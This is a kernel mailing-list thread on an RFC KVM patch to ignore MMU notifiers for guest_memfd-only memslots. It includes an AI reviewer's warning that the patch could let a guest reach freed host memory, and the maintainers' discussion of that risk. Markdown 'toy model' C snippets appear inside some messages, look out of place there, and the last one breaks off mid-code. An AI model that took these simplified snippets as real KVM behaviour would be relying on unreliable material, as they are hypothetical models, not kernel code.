[RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots


* [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots
@ 2026-06-15 15:52 Alexandru Elisei
  2026-06-15 16:09 ` sashiko-bot
                   ` (2 more replies)
  0 siblings, 3 replies; 17+ messages in thread
From: Alexandru Elisei @ 2026-06-15 15:52 UTC (permalink / raw)
  To: pbonzini, kvm, linux-kernel, maz, oupton, suzuki.poulose, kvmarm,
	linux-arm-kernel, seanjc, david.hildenbrand, mark.rutland

For guest_memfd-only memslots (kvm_memslot_is_gmem_only() is true), the
memory provider for the virtual machine is the guest_memfd file, not the
userspace mapping. Faults are resolved using the guest_memfd page cache,
and the permissions for the secondary MMU mapping depend exclusively on
the memslot (i.e., if the memslot is read-only). How userspace happens to
have the memory mmapped at fault time, or even if the memory is mapped at
all into userspace, is not taken into consideration.

guest_memfd memory is not evictable, is not movable and there's no backing
storage. Once memory is allocated for an offset in guest_memfd file, the
offset will not change, and that memory is not freed unless userspace
explicitly punches a hole in the file. As a result, memory reclaim, page
migration, page aging and dirty page tracking for the userspace mapping
serve little purpose.

Despite this, KVM's MMU notifiers still modify the secondary MMU page
tables, similar to ordinary memslots, only for the same memory to be
remapped next time a guest accesses it. Make the disconnect between the
user mapping and the secondary MMU page tables explicit by ignoring the MMU
notifiers for guest_memfd-only memslots.

Signed-off-by: Alexandru Elisei <alexandru.elisei@arm.com>
---
The only theoretical instance where the MMU notifiers are invoked for the
userspace mapping of a guest_memfd-only memslot that I was able to find was
automatic NUMA balancing with a non-NULL NUMA policy for the guest_memfd
file. I wasn't able to test it in practice. Also my knowledge of MM is very
limited, so there might be other cases where it happens, or I might be
wrong and today the MMU notifiers are never invoked.

Either way, when and if it happens, having memory unmapped from the
secondary MMU in the case of a guest_memfd-only memslot is at most a
performance issue (it causes unnecessary guest faults), but I wanted to
start a conversation about this because having memory that stays mapped at
stage 2 (unless userspace explicitly unmaps it from the VM) is needed for an
Arm feature (called SPE, Statistical Profiling Extension) that I'm working
to upstream. This patch aims to provide the guarantee that memory won't be
unmapped from the secondary MMU behind the VMM's back, which is what happens
for non guest_memfd memslots.

 virt/kvm/kvm_main.c | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
index 881f92d7a469..8c4158996928 100644
--- a/virt/kvm/kvm_main.c
+++ b/virt/kvm/kvm_main.c
@@ -592,6 +592,10 @@ static __always_inline kvm_mn_ret_t kvm_handle_hva_range(struct kvm *kvm,
 			unsigned long hva_start, hva_end;

 			slot = container_of(node, struct kvm_memory_slot, hva_node[slots->node_idx]);
+
+			if (kvm_slot_has_gmem(slot) && kvm_memslot_is_gmem_only(slot))
+				continue;
+
 			hva_start = max_t(unsigned long, range->start, slot->userspace_addr);
 			hva_end = min_t(unsigned long, range->end,
 					slot->userspace_addr + (slot->npages << PAGE_SHIFT));

base-commit: 8cd9520d35a6c38db6567e97dd93b1f11f185dc6
-- 
2.54.0


* Re: [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots
  2026-06-15 15:52 [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots Alexandru Elisei
@ 2026-06-15 16:09 ` sashiko-bot
  2026-06-15 17:47   ` Sean Christopherson
  2026-06-15 19:07 ` David Hildenbrand
  2026-06-21  0:02 ` XIAO WU
  2 siblings, 1 reply; 17+ messages in thread
From: sashiko-bot @ 2026-06-15 16:09 UTC (permalink / raw)
  To: Alexandru Elisei; +Cc: Marc Zyngier, kvm, kvmarm, Oliver Upton

Thank you for your contribution! Sashiko AI review found 1 potential issue(s) to consider:
- [Critical] Skipping MMU notifiers for guest_memfd-only memslots breaks the pfncache retry protocol, leading to a host-level Use-After-Free.
--

commit 8278d4b7bdd8bdfe7a6bc39dd2a0418838234428
Author: Alexandru Elisei <alexandru.elisei@arm.com>

KVM: Ignore MMU notifiers for guest_memfd-only memslots

This commit modifies KVM's MMU notifier handling to ignore guest_memfd-only
memslots. The rationale is that guest_memfd memory is not evictable or movable,
making traditional userspace MMU notifier tracking unnecessary.

> diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
> --- a/virt/kvm/kvm_main.c
> +++ b/virt/kvm/kvm_main.c
[ ... ]
> @@ -592,6 +592,10 @@ static __always_inline kvm_mn_ret_t kvm_handle_hva_range(struct kvm *kvm,
>  			unsigned long hva_start, hva_end;
>  
>  			slot = container_of(node, struct kvm_memory_slot, hva_node[slots->node_idx]);
> +
> +			if (kvm_slot_has_gmem(slot) && kvm_memslot_is_gmem_only(slot))
> +				continue;
> +

[Severity: Critical]
Does this change inadvertently introduce a regression in the pfncache retry
protocol?

Looking at the pfncache framework, it maps guest memory into kernel space and
explicitly drops the page reference after mapping it:

virt/kvm/pfncache.c:hva_to_pfn_retry() {
    ...
    kvm_release_page_clean(page);
    ...
}

It appears to rely entirely on KVM's MMU notifiers (kvm->mmu_invalidate_seq)
to invalidate the cache when the page is unmapped by the host.

If a VMM defines a guest_memfd-backed memslot with KVM_MEMSLOT_GMEM_ONLY
but still provides a valid anonymous user mapping as its userspace_addr,
could this regression lead to a use-after-free? By unmapping the anonymous
memory, the host would trigger MMU notifiers, but this new check skips
the memslot. As a result, kvm->mmu_invalidate_seq wouldn't increment, and
KVM might retain a kernel mapping to a freed physical page.

Could this allow the guest to read or write arbitrary host physical memory?

>  			hva_start = max_t(unsigned long, range->start, slot->userspace_addr);
>  			hva_end = min_t(unsigned long, range->end,
>  					slot->userspace_addr + (slot->npages << PAGE_SHIFT));

-- 
Sashiko AI review · https://sashiko.dev/#/patchset/20260615155244.183044-1-alexandru.elisei@arm.com?part=1


* Re: [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots
  2026-06-15 16:09 ` sashiko-bot
@ 2026-06-15 17:47   ` Sean Christopherson
  2026-06-15 18:09     ` Sean Christopherson
                       ` (2 more replies)
  0 siblings, 3 replies; 17+ messages in thread
From: Sean Christopherson @ 2026-06-15 17:47 UTC (permalink / raw)
  To: sashiko-reviews; +Cc: Alexandru Elisei, Marc Zyngier, kvm, kvmarm, Oliver Upton

On Mon, Jun 15, 2026, sashiko-bot@kernel.org wrote:
> > diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
> > --- a/virt/kvm/kvm_main.c
> > +++ b/virt/kvm/kvm_main.c
> [ ... ]
> > @@ -592,6 +592,10 @@ static __always_inline kvm_mn_ret_t kvm_handle_hva_range(struct kvm *kvm,
> >  			unsigned long hva_start, hva_end;
> >  
> >  			slot = container_of(node, struct kvm_memory_slot, hva_node[slots->node_idx]);
> > +
> > +			if (kvm_slot_has_gmem(slot) && kvm_memslot_is_gmem_only(slot))
> > +				continue;
> > +
> 
> [Severity: Critical]
> Does this change inadvertently introduce a regression in the pfncache retry
> protocol?
> 
> Looking at the pfncache framework, it maps guest memory into kernel space and
> explicitly drops the page reference after mapping it:
> 
> virt/kvm/pfncache.c:hva_to_pfn_retry() {
>     ...
>     kvm_release_page_clean(page);
>     ...
> }
> 
> It appears to rely entirely on KVM's MMU notifiers (kvm->mmu_invalidate_seq)
> to invalidate the cache when the page is unmapped by the host.
> 
> If a VMM defines a guest_memfd-backed memslot with KVM_MEMSLOT_GMEM_ONLY
> but still provides a valid anonymous user mapping as its userspace_addr,
> could this regression lead to a use-after-free?

Sadly, yes.  To land this, we would need to first teach the gfn_to_pfn_cache code
to be able to pull directly from guest_memfd.  I forget if anyone is working on
that.

> By unmapping the anonymous memory, the host would trigger MMU notifiers, but
> this new check skips the memslot. As a result, kvm->mmu_invalidate_seq
> wouldn't increment, and KVM might retain a kernel mapping to a freed physical
> page.
> 
> Could this allow the guest to read or write arbitrary host physical memory?
> 
> >  			hva_start = max_t(unsigned long, range->start, slot->userspace_addr);
> >  			hva_end = min_t(unsigned long, range->end,
> >  					slot->userspace_addr + (slot->npages << PAGE_SHIFT));
> 
> -- 
> Sashiko AI review · https://sashiko.dev/#/patchset/20260615155244.183044-1-alexandru.elisei@arm.com?part=1


* Re: [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots
  2026-06-15 17:47   ` Sean Christopherson
@ 2026-06-15 18:09     ` Sean Christopherson
  2026-06-18 11:09       ` Alexandru Elisei
  2026-06-17 13:07     ` Alexandru Elisei
  2026-06-18 11:26     ` David Hildenbrand (Arm)
  2 siblings, 1 reply; 17+ messages in thread
From: Sean Christopherson @ 2026-06-15 18:09 UTC (permalink / raw)
  To: sashiko-reviews; +Cc: Alexandru Elisei, Marc Zyngier, kvm, kvmarm, Oliver Upton

On Mon, Jun 15, 2026, Sean Christopherson wrote:
> On Mon, Jun 15, 2026, sashiko-bot@kernel.org wrote:
> > > diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
> > > --- a/virt/kvm/kvm_main.c
> > > +++ b/virt/kvm/kvm_main.c
> > [ ... ]
> > > @@ -592,6 +592,10 @@ static __always_inline kvm_mn_ret_t kvm_handle_hva_range(struct kvm *kvm,
> > >  			unsigned long hva_start, hva_end;
> > >  
> > >  			slot = container_of(node, struct kvm_memory_slot, hva_node[slots->node_idx]);
> > > +
> > > +			if (kvm_slot_has_gmem(slot) && kvm_memslot_is_gmem_only(slot))
> > > +				continue;
> > > +
> > 
> > [Severity: Critical]
> > Does this change inadvertently introduce a regression in the pfncache retry
> > protocol?
> > 
> > Looking at the pfncache framework, it maps guest memory into kernel space and
> > explicitly drops the page reference after mapping it:
> > 
> > virt/kvm/pfncache.c:hva_to_pfn_retry() {
> >     ...
> >     kvm_release_page_clean(page);
> >     ...
> > }
> > 
> > It appears to rely entirely on KVM's MMU notifiers (kvm->mmu_invalidate_seq)
> > to invalidate the cache when the page is unmapped by the host.
> > 
> > If a VMM defines a guest_memfd-backed memslot with KVM_MEMSLOT_GMEM_ONLY
> > but still provides a valid anonymous user mapping as its userspace_addr,
> > could this regression lead to a use-after-free?
> 
> Sadly, yes.  To land this, we would need to first teach the gfn_to_pfn_cache code
> to be able to pull directly from guest_memfd.  I forget if anyone is working on
> that.

Actually, we just need to ensure the invalidation tracking is updated; the MMU
itself can be left as-is.

Compile tested only, but this?

diff --git a/include/linux/kvm_host.h b/include/linux/kvm_host.h
index 27498e990dff..690ab707816b 100644
--- a/include/linux/kvm_host.h
+++ b/include/linux/kvm_host.h
@@ -260,6 +260,7 @@ union kvm_mmu_notifier_arg {
 enum kvm_gfn_range_filter {
        KVM_FILTER_SHARED               = BIT(0),
        KVM_FILTER_PRIVATE              = BIT(1),
+       KVM_FILTER_USERSPACE_MAPPINGS   = BIT(2),
 };
 
 struct kvm_gfn_range {
diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
index e44c20c04961..84b693de7e35 100644
--- a/virt/kvm/kvm_main.c
+++ b/virt/kvm/kvm_main.c
@@ -608,7 +608,8 @@ static __always_inline kvm_mn_ret_t kvm_handle_hva_range(struct kvm *kvm,
                         * HVA-based notifications aren't relevant to private
                         * mappings as they don't have a userspace mapping.
                         */
-                       gfn_range.attr_filter = KVM_FILTER_SHARED;
+                       gfn_range.attr_filter = KVM_FILTER_SHARED |
+                                               KVM_FILTER_USERSPACE_MAPPINGS;
 
                        /*
                         * {gfn(page) | page intersects with [hva_start, hva_end)} =
@@ -715,6 +716,21 @@ void kvm_mmu_invalidate_range_add(struct kvm *kvm, gfn_t start, gfn_t end)
 bool kvm_mmu_unmap_gfn_range(struct kvm *kvm, struct kvm_gfn_range *range)
 {
        kvm_mmu_invalidate_range_add(kvm, range->start, range->end);
+
+       /*
+        * When reacting to changes in userspace mappings, don't unmap memslots
+        * that are guest_memfd-only, in which case KVM's MMU mappings are
+        * pulled directly from guest_memfd, i.e. don't depend on the userspace
+        * mappings.
+        *
+        * TODO: Skip gmem-only memslots on mmu_notifier events entirely, once
+        * gfn_to_pfn_cache is also wired up to directly pull from guest_memfd.
+        */
+       if (range->attr_filter & KVM_FILTER_USERSPACE_MAPPINGS &&
+           kvm_slot_has_gmem(range->slot) &&
+           kvm_memslot_is_gmem_only(range->slot))
+               return false;
+
        return kvm_unmap_gfn_range(kvm, range);
 }
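
The intent of the draft above can be modelled in a few lines of standalone C. This is only a toy sketch under stated assumptions: the `toy_*` names, the `toy_stats` counters and the "returns true if an unmap happened" convention are all hypothetical and are not KVM's real types or return semantics. It shows the one property the draft relies on: the invalidation bookkeeping runs for every range, while the secondary MMU unmap is skipped only for gmem-only slots on events that originate from userspace mappings.

```c
#include <stdbool.h>

/* Hypothetical stand-ins for the filter bits in the draft patch. */
enum toy_filter {
	TOY_FILTER_SHARED             = 1 << 0,
	TOY_FILTER_PRIVATE            = 1 << 1,
	TOY_FILTER_USERSPACE_MAPPINGS = 1 << 2,
};

/* Hypothetical, heavily reduced view of a gfn range and its memslot. */
struct toy_range {
	unsigned int attr_filter;
	bool slot_gmem_only;
};

/* Counters used only to observe what the toy handler did. */
struct toy_stats {
	unsigned int ranges_tracked; /* invalidation bookkeeping updates */
	unsigned int unmaps;         /* secondary MMU unmaps performed */
};

/* Toy model: returns true if the secondary MMU mapping was torn down. */
static bool toy_unmap_gfn_range(struct toy_stats *st, const struct toy_range *r)
{
	/* Always record the range, so that retry logic sees the event. */
	st->ranges_tracked++;

	/* Userspace-mapping events do not affect gmem-only MMU mappings. */
	if ((r->attr_filter & TOY_FILTER_USERSPACE_MAPPINGS) && r->slot_gmem_only)
		return false;

	st->unmaps++;
	return true;
}
```

In this model a gmem-only slot hit by a userspace-mapping event bumps `ranges_tracked` but not `unmaps`, while an ordinary slot bumps both.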


* Re: [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots
  2026-06-15 15:52 [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots Alexandru Elisei
  2026-06-15 16:09 ` sashiko-bot
@ 2026-06-15 19:07 ` David Hildenbrand
  2026-06-17 13:23   ` Alexandru Elisei
  2026-06-21  0:02 ` XIAO WU
  2 siblings, 1 reply; 17+ messages in thread
From: David Hildenbrand @ 2026-06-15 19:07 UTC (permalink / raw)
  To: Alexandru Elisei, pbonzini, kvm, linux-kernel, maz, oupton,
	suzuki.poulose, kvmarm, linux-arm-kernel, seanjc, mark.rutland

On 6/15/26 17:52, Alexandru Elisei wrote:
> For guest_memfd-only memslots (kvm_memslot_is_gmem_only() is true), the
> memory provider for the virtual machine is the guest_memfd file, not the
> userspace mapping. Faults are resolved using the guest_memfd page cache,
> and the permissions for the secondary MMU mapping depend exclusively on
> the memslot (i.e., if the memslot is read-only). How userspace happens to
> have the memory mmapped at fault time, or even if the memory is mapped at
> all into userspace, is not taken into consideration.
> 
> guest_memfd memory is not evictable, is not movable and there's no backing
> storage. Once memory is allocated for an offset in guest_memfd file, the
> offset will not change, and that memory is not freed unless userspace
> explicitly punches a hole in the file. As a result, memory reclaim, page
> migration, page aging and dirty page tracking for the userspace mapping
> serve little purpose.

I don't think any of that is relevant for the patch at hand?

The thing is: invalidation (truncation, later migration, for any other reason)
is driven through guest_memfd notifications, not through unrelated page tables.

If we don't lookup pages for the KVM MMU through the page table, then there is
also no need for MMU notifiers. It's all guest_memfd only.

Or am I missing something?

-- 
Cheers,

David


* Re: [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots
  2026-06-15 17:47   ` Sean Christopherson
  2026-06-15 18:09     ` Sean Christopherson
@ 2026-06-17 13:07     ` Alexandru Elisei
  2026-06-17 21:21       ` Sean Christopherson
  2026-06-17 21:22       ` Sean Christopherson
  2026-06-18 11:26     ` David Hildenbrand (Arm)
  2 siblings, 2 replies; 17+ messages in thread
From: Alexandru Elisei @ 2026-06-17 13:07 UTC (permalink / raw)
  To: Sean Christopherson
  Cc: sashiko-reviews, Marc Zyngier, kvm, kvmarm, Oliver Upton

Hi Sean,

Thanks for the reply. Just to make sure, once the bugs have been ironed out,
you're ok with this idea?

On Mon, Jun 15, 2026 at 10:47:14AM -0700, Sean Christopherson wrote:
> On Mon, Jun 15, 2026, sashiko-bot@kernel.org wrote:
> > > diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
> > > --- a/virt/kvm/kvm_main.c
> > > +++ b/virt/kvm/kvm_main.c
> > [ ... ]
> > > @@ -592,6 +592,10 @@ static __always_inline kvm_mn_ret_t kvm_handle_hva_range(struct kvm *kvm,
> > >  			unsigned long hva_start, hva_end;
> > >  
> > >  			slot = container_of(node, struct kvm_memory_slot, hva_node[slots->node_idx]);
> > > +
> > > +			if (kvm_slot_has_gmem(slot) && kvm_memslot_is_gmem_only(slot))
> > > +				continue;
> > > +
> > 
> > [Severity: Critical]
> > Does this change inadvertently introduce a regression in the pfncache retry
> > protocol?
> > 
> > Looking at the pfncache framework, it maps guest memory into kernel space and
> > explicitly drops the page reference after mapping it:
> > 
> > virt/kvm/pfncache.c:hva_to_pfn_retry() {
> >     ...
> >     kvm_release_page_clean(page);
> >     ...
> > }
> > 
> > It appears to rely entirely on KVM's MMU notifiers (kvm->mmu_invalidate_seq)
> > to invalidate the cache when the page is unmapped by the host.
> > 
> > If a VMM defines a guest_memfd-backed memslot with KVM_MEMSLOT_GMEM_ONLY
> > but still provides a valid anonymous user mapping as its userspace_addr,
> > could this regression lead to a use-after-free?
> 
> Sadly, yes.  To land this, we would need to first teach the gfn_to_pfn_cache code
> to be able to pull directly from guest_memfd.  I forget if anyone is working on
> that.

I've been trying to wrap my head around this, and I just can't seem to
figure it out.

kvm_mmu_notifier_invalidate_range_start(), before handle_hva_range(), calls
gfn_to_pfn_cache_invalidate_start() for the MMU notifier range, and that
marks all caches that overlap the range as invalid. kvm_gpc_check() returns
false for an invalid cache, so how can the memory still be accessed via the
pfncache?

> 
> > By unmapping the anonymous memory, the host would trigger MMU notifiers, but
> > this new check skips the memslot. As a result, kvm->mmu_invalidate_seq
> > wouldn't increment, and KVM might retain a kernel mapping to a freed physical
> > page.

kvm->mmu_invalidate_seq is incremented in kvm_mmu_invalidate_end(), I don't see
how that is affected by skipping a memslot in handle_hva_range().

> > 
> > Could this allow the guest to read or write arbitrary host physical memory?

The KVM_MEMSLOT_GMEM_ONLY flag is set if the backing guest_memfd has been
created with GUEST_MEMFD_FLAG_MMAP. The documentation for the flag says
that '[..] the fault will always be consumed from guest_memfd, regardless
of whether it is a shared or private fault'.  As far as I can tell, this
means that, absent a fallocate(FALLOC_FL_PUNCH_HOLE) call, the page is
still in the page cache for the guest_memfd file after userspace has
unmapped it, so the guest will not be accessing a freed page.

Thoughts? Am I missing something obvious?

Thanks,
Alex

> > 
> > >  			hva_start = max_t(unsigned long, range->start, slot->userspace_addr);
> > >  			hva_end = min_t(unsigned long, range->end,
> > >  					slot->userspace_addr + (slot->npages << PAGE_SHIFT));
> > 
> > -- 
> > Sashiko AI review · https://sashiko.dev/#/patchset/20260615155244.183044-1-alexandru.elisei@arm.com?part=1


* Re: [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots
  2026-06-15 19:07 ` David Hildenbrand
@ 2026-06-17 13:23   ` Alexandru Elisei
  2026-06-17 13:41     ` David Hildenbrand
  0 siblings, 1 reply; 17+ messages in thread
From: Alexandru Elisei @ 2026-06-17 13:23 UTC (permalink / raw)
  To: David Hildenbrand
  Cc: pbonzini, kvm, linux-kernel, maz, oupton, suzuki.poulose, kvmarm,
	linux-arm-kernel, seanjc, mark.rutland

Hi David,

On Mon, Jun 15, 2026 at 09:07:50PM +0200, David Hildenbrand wrote:
> On 6/15/26 17:52, Alexandru Elisei wrote:
> > For guest_memfd-only memslots (kvm_memslot_is_gmem_only() is true), the
> > memory provider for the virtual machine is the guest_memfd file, not the
> > userspace mapping. Faults are resolved using the guest_memfd page cache,
> > and the permissions for the secondary MMU mapping depend exclusively on
> > the memslot (i.e., if the memslot is read-only). How userspace happens to
> > have the memory mmapped at fault time, or even if the memory is mapped at
> > all into userspace, is not taken into consideration.
> > 
> > guest_memfd memory is not evictable, is not movable and there's no backing
> > storage. Once memory is allocated for an offset in guest_memfd file, the
> > offset will not change, and that memory is not freed unless userspace
> > explicitly punches a hole in the file. As a result, memory reclaim, page
> > migration, page aging and dirty page tracking for the userspace mapping
> > serve little purpose.
> 
> I don't think any of that is relevant for the patch at hand?
> 
> The thing is: invalidation (truncation, later migration, for any other reason)
> is driven through guest_memfd notifications, not through unrelated page tables.
> 
> If we don't lookup pages for the KVM MMU through the page table, then there is
> also no need for MMU notifiers. It's all guest_memfd only.
> 
> Or am I missing something?

My thinking was that, because guest_memfd is not evictable, there is no need to
do page ageing, which would require that secondary MMU mappings be made old.

The invalidate callbacks are also used when userspace memory is marked read-only
for dirty state tracking. I was trying to explain that, since there is no
backing for the guest_memfd file, host doesn't need to keep track of dirty state
for the memory, and ignoring the invalidate callbacks is correct for all cases.

I can drop the paragraph entirely, if you think that would make the commit
message clearer.

Thanks,
Alex


* Re: [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots
  2026-06-17 13:23   ` Alexandru Elisei
@ 2026-06-17 13:41     ` David Hildenbrand
  2026-06-17 13:50       ` Alexandru Elisei
  0 siblings, 1 reply; 17+ messages in thread
From: David Hildenbrand @ 2026-06-17 13:41 UTC (permalink / raw)
  To: Alexandru Elisei
  Cc: pbonzini, kvm, linux-kernel, maz, oupton, suzuki.poulose, kvmarm,
	linux-arm-kernel, seanjc, mark.rutland

On 6/17/26 15:23, Alexandru Elisei wrote:
> Hi David,
> 
> On Mon, Jun 15, 2026 at 09:07:50PM +0200, David Hildenbrand wrote:
>> On 6/15/26 17:52, Alexandru Elisei wrote:
>>> For guest_memfd-only memslots (kvm_memslot_is_gmem_only() is true), the
>>> memory provider for the virtual machine is the guest_memfd file, not the
>>> userspace mapping. Faults are resolved using the guest_memfd page cache,
>>> and the permissions for the secondary MMU mapping depend exclusively on
>>> the memslot (i.e., if the memslot is read-only). How userspace happens to
>>> have the memory mmapped at fault time, or even if the memory is mapped at
>>> all into userspace, is not taken into consideration.
>>>
>>> guest_memfd memory is not evictable, is not movable and there's no backing
>>> storage. Once memory is allocated for an offset in guest_memfd file, the
>>> offset will not change, and that memory is not freed unless userspace
>>> explicitly punches a hole in the file. As a result, memory reclaim, page
>>> migration, page aging and dirty page tracking for the userspace mapping
>>> serve little purpose.
>>
>> I don't think any of that is relevant for the patch at hand?
>>
>> The thing is: invalidation (truncation, later migration, for any other reason)
>> is driven through guest_memfd notifications, not through unrelated page tables.
>>
>> If we don't lookup pages for the KVM MMU through the page table, then there is
>> also no need for MMU notifiers. It's all guest_memfd only.
>>
>> Or am I missing something?
> 
> My thinking was that, because guest_memfd is not evictable, there is no need to
> do page ageing, which would require that secondary MMU mappings be made old.

Not really.

The KVM MMU did not obtain the folios through the page tables, but directly
through guest_memfd. Any aging would, therefore, have to be done through
guest_memfd.

Which we don't support and don't want to support :)

That we happen to have a matching user space range that maps the guest_memfd is
just coincidence from a KVM MMU point of view.

> 
> The invalidate callbacks are also used when userspace memory is marked read-only
> for dirty state tracking. I was trying to explain that, since there is no
> backing for the guest_memfd file, host doesn't need to keep track of dirty state
> for the memory, and ignoring the invalidate callbacks is correct for all cases.
> 
> I can drop the paragraph entirely, if you think that would make the commit
> message clearer.

I think the real motivation is:

"Mappings in the secondary MMU were established by obtaining folios from
guest_memfd directly, not by looking the folios up through the page tables
through GUP. Consequently, there is no relationship between the page tables and
the secondary MMU: MMU notifiers do not apply."

-- 
Cheers,

David


* Re: [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots
  2026-06-17 13:41     ` David Hildenbrand
@ 2026-06-17 13:50       ` Alexandru Elisei
  0 siblings, 0 replies; 17+ messages in thread
From: Alexandru Elisei @ 2026-06-17 13:50 UTC (permalink / raw)
  To: David Hildenbrand
  Cc: pbonzini, kvm, linux-kernel, maz, oupton, suzuki.poulose, kvmarm,
	linux-arm-kernel, seanjc, mark.rutland

Hi David,

On Wed, Jun 17, 2026 at 03:41:41PM +0200, David Hildenbrand wrote:
> On 6/17/26 15:23, Alexandru Elisei wrote:
> > Hi David,
> > 
> > On Mon, Jun 15, 2026 at 09:07:50PM +0200, David Hildenbrand wrote:
> >> On 6/15/26 17:52, Alexandru Elisei wrote:
> >>> For guest_memfd-only memslots (kvm_memslot_is_gmem_only() is true), the
> >>> memory provider for the virtual machine is the guest_memfd file, not the
> >>> userspace mapping. Faults are resolved using the guest_memfd page cache,
> >>> and the permissions for the secondary MMU mapping depend exclusively on
> >>> the memslot (i.e., if the memslot is read-only). How userspace happens to
> >>> have the memory mmapped at fault time, or even if the memory is mapped at
> >>> all into userspace, is not taken into consideration.
> >>>
> >>> guest_memfd memory is not evictable, is not movable and there's no backing
> >>> storage. Once memory is allocated for an offset in guest_memfd file, the
> >>> offset will not change, and that memory is not freed unless userspace
> >>> explicitly punches a hole in the file. As a result, memory reclaim, page
> >>> migration, page aging and dirty page tracking for the userspace mapping
> >>> serve little purpose.
> >>
> >> I don't think any of that is relevant for the patch at hand?
> >>
> >> The thing is: invalidation (truncation, later migration, for any other reason)
> >> is driven through guest_memfd notifications, not through unrelated page tables.
> >>
> >> If we don't lookup pages for the KVM MMU through the page table, then there is
> >> also no need for MMU notifiers. It's all guest_memfd only.
> >>
> >> Or am I missing something?
> > 
> > My thinking was that, because guest_memfd is not evictable, there is no need to
> > do page ageing, which would require that secondary MMU mappings be made old.
> 
> Not really.
> 
> The KVM MMU did not obtain the folios through the page tables, but directly
> through guest_memfd. Any aging would, therefore, have to be done through
> guest_memfd.
> 
> Which we don't support and don't want to support :)
> 
> That we happen to have a matching user space range that maps the guest_memfd is
> just coincidence from a KVM MMU point of view.
> 
> > 
> > The invalidate callbacks are also used when userspace memory is marked read-only
> > for dirty state tracking. I was trying to explain that, since there is no
> > backing for the guest_memfd file, host doesn't need to keep track of dirty state
> > for the memory, and ignoring the invalidate callbacks is correct for all cases.
> > 
> > I can drop the paragraph entirely, if you think that would make the commit
> > message clearer.
> 
> I think the real motivation is:
> 
> "Mappings in the secondary MMU were established by obtaining folios from
> guest_memfd directly, not by looking the folios up through the page tables
> through GUP. Consequently, there is no relationship between the page tables and
> the secondary MMU: MMU notifiers do not apply."

That's much better than my version, thanks!

Alex


* Re: [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots
  2026-06-17 13:07     ` Alexandru Elisei
@ 2026-06-17 21:21       ` Sean Christopherson
  2026-06-18 10:19         ` Alexandru Elisei
  2026-06-23 23:41         ` Ackerley Tng
  2026-06-17 21:22       ` Sean Christopherson
  1 sibling, 2 replies; 17+ messages in thread
From: Sean Christopherson @ 2026-06-17 21:21 UTC (permalink / raw)
  To: Alexandru Elisei; +Cc: sashiko-reviews, Marc Zyngier, kvm, kvmarm, Oliver Upton

On Wed, Jun 17, 2026, Alexandru Elisei wrote:
> Hi Sean,
> 
> Thanks for the reply. Just to make sure, once the bugs have been ironed out,
> you're ok with this idea?
> 
> On Mon, Jun 15, 2026 at 10:47:14AM -0700, Sean Christopherson wrote:
> > On Mon, Jun 15, 2026, sashiko-bot@kernel.org wrote:
> > > > diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
> > > > --- a/virt/kvm/kvm_main.c
> > > > +++ b/virt/kvm/kvm_main.c
> > > [ ... ]
> > > > @@ -592,6 +592,10 @@ static __always_inline kvm_mn_ret_t kvm_handle_hva_range(struct kvm *kvm,
> > > >  			unsigned long hva_start, hva_end;
> > > >  
> > > >  			slot = container_of(node, struct kvm_memory_slot, hva_node[slots->node_idx]);
> > > > +
> > > > +			if (kvm_slot_has_gmem(slot) && kvm_memslot_is_gmem_only(slot))
> > > > +				continue;
> > > > +
> > > 
> > > [Severity: Critical]
> > > Does this change inadvertently introduce a regression in the pfncache retry
> > > protocol?
> > > 
> > > Looking at the pfncache framework, it maps guest memory into kernel space and
> > > explicitly drops the page reference after mapping it:
> > > 
> > > virt/kvm/pfncache.c:hva_to_pfn_retry() {
> > >     ...
> > >     kvm_release_page_clean(page);
> > >     ...
> > > }
> > > 
> > > It appears to rely entirely on KVM's MMU notifiers (kvm->mmu_invalidate_seq)
> > > to invalidate the cache when the page is unmapped by the host.
> > > 
> > > If a VMM defines a guest_memfd-backed memslot with KVM_MEMSLOT_GMEM_ONLY
> > > but still provides a valid anonymous user mapping as its userspace_addr,
> > > could this regression lead to a use-after-free?
> > 
> > Sadly, yes.  To land this, we would need to first teach the gfn_to_pfn_cache code
> > to be able to pull directly from guest_memfd.  I forget if anyone is working on
> > that.
> 
> I've been trying to wrap my head around this, and I just can't seem to
> figure it out.
> 
> kvm_mmu_notifier_invalidate_range_start(), before handle_hva_range(), calls
> gfn_to_pfn_cache_invalidate_start() for the MMU notifier range, and that
> marks all caches that overlap the range as invalid. kvm_gpc_check() returns
> false for an invalid cache, so how can the memory still be accessed via the
> pfncache?

That just forces gpcs to be refreshed, mmu_notifier_retry_cache() still relies
on mmu_invalidate_seq being bumped to avoid consuming stale state.
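
The reliance on the sequence count can be illustrated with a small single-threaded C model. It is a sketch under assumptions, not the pfncache code: every `toy_*` name is hypothetical, the "race" is simulated by having the lookup itself move the page, and the real retry check also considers in-progress invalidations, which this model leaves out. The refresh loop snapshots the sequence count, performs the lookup, and retries if the count changed in between.

```c
#include <stdbool.h>

/* Hypothetical toy VM state; not KVM's real structures. */
struct toy_vm {
	unsigned long invalidate_seq; /* bumped by (simulated) invalidations */
	unsigned long current_pfn;    /* where the page really lives now */
	int races_left;               /* simulated invalidations still to fire */
	bool bump_seq;                /* does the invalidation bump the count? */
};

/*
 * Simulated lookup: returns the pfn as it was when the lookup started.
 * While races_left > 0, an invalidation "races" with the lookup and moves
 * the page; it bumps invalidate_seq only if bump_seq is set.
 */
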